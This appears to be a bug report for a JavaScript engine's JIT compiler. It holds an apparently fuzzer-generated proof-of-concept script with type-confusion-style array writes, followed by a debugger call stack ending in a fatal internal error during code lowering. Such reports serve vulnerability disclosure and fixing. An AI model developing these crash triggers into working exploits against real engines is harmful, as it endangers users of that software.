[FatalInternalError] ReportFatalException14 #6637
Description
enviroment
ubuntu 18
poc
function opt(index) {
var flag = 0;
var tmp = new String('aa');
tmp.x = 2;
var i = 0;
function test() {
testDate('0001-10-13T05:16:33Z');
testDate('0011-10-13T05:16:33Z');
var hiddenValue = getHiddenValue();
var result;
testDate('0111-10-13T05:16:33Z');
testDate('1111-10-13T05:16:33Z');
testDate('-000001-11-13T19:40:33Z');
testDate('-000011-11-13T19:40:33Z');
testDate('-000111-11-13T19:40:33Z');
testDate('-001111-11-13T19:40:33Z');
}
var ary_3 = [
1.1,
2.2,
3.3
];
var error = null;
var DjjB = tmp.trimLeft();
var test12 = new Int32Array(0);
once = 1;
var i = 0;
var go = function (a, b, c) {
a[0] = 1.1;
a[1] = 2.2;
[...c];
var fun = eval(str);
b[0] = a[0];
a[2] = 2.3023e-320;
};
for (let useless in tmp) {
if (once) {
var go = function (a, b, c) {
a[0] = 1.1;
a[1] = 2.2;
[...c];
b[0] = a[0];
a[2] = 2.3023e-320;
};
delete tmp.x;
var fun = eval(str);
var object = {};
var i = 0.26279099966609487;
var f64_1 = new Float64Array(16);
once = 0.2969306068681026;
}
var z = cache.push(i, String() * 42);
tmp.y = index;
for (var ijjkkk = 0; ijjkkk < 594; ++ijjkkk) {
var KaRd = Symbol;
}
tmp.x = 1;
}
return [
1,
tmp.x - 524286
];
}
var cache = [];
for (let i = 0; i < 561; i++) {
opt(1);
}
evil = opt(0);
function shouldBe(actual, expected) {
;
}
var str = 'class x extends Array{}';
var f64_1 = new Float64Array(16);
evil[0] = 1.1;
callstack
[#0] 0x555555d59fac → DebugBreak()
[#1] 0x555555d59fac → ReportFatalException(context=<optimized out>, exceptionCode=<optimized out>, reasonCode=<optimized out>, scenario=<optimized out>)
[#2] 0x555555d5a709 → Js::Throw::FatalInternalError(hr=0x7d7f7de0)
[#3] 0x555558643c89 → Lowerer::MapStFldHelper(this=<optimized out>, propertySymOpnd=<optimized out>, helperMethod=@0x7ff7ebffc6c0, polymorphicHelperMethod=@0x7ff7ebffc6d0)
[#4] 0x5555585bb33a → Lowerer::LowerStFld(this=<optimized out>, stFldInstr=<optimized out>, helperMethod=<optimized out>, polymorphicHelperMethod=<optimized out>, withInlineCache=0x0, labelBailOut=0x0, isHelper=<optimized out>, withPutFlags=<optimized out>, flags=<optimized out>)
[#5] 0x5555585a6efc → Lowerer::LowerRange(this=0x7ff7ebffd490, instrStart=<optimized out>, instrEnd=<optimized out>, defaultDoFastPath=<optimized out>, defaultDoLoopFastPath=0x0)
[#6] 0x55555859d345 → Lowerer::Lower(this=0x7ff7ebffd490)
[#7] 0x55555814f951 → Func::TryCodegen(this=<optimized out>)
[#8] 0x55555814d944 → Func::Codegen(alloc=0x7ff7ebffe6c0, workItem=0x7ffff1fc1030, threadContextInfo=0x622000000140, scriptContextInfo=0x61a000000680, outputData=0x7ff7ebffe8e0, epInfo=0x7ffff23c58c0, runtimeInfo=<optimized out>, polymorphicInlineCacheInfo=<optimized out>, codeGenAllocators=<optimized out>, codeGenProfiler=<optimized out>, isBackgroundJIT=<optimized out>)
[#9] 0x555557e4d330 → NativeCodeGenerator::CodeGen(this=<optimized out>, pageAllocator=<optimized out>, workItemData=0xc2200000061, jitWriteData=@0x7ff7ebffe8e0, foreground=0x0, epInfo=0x7ffff23c58c0)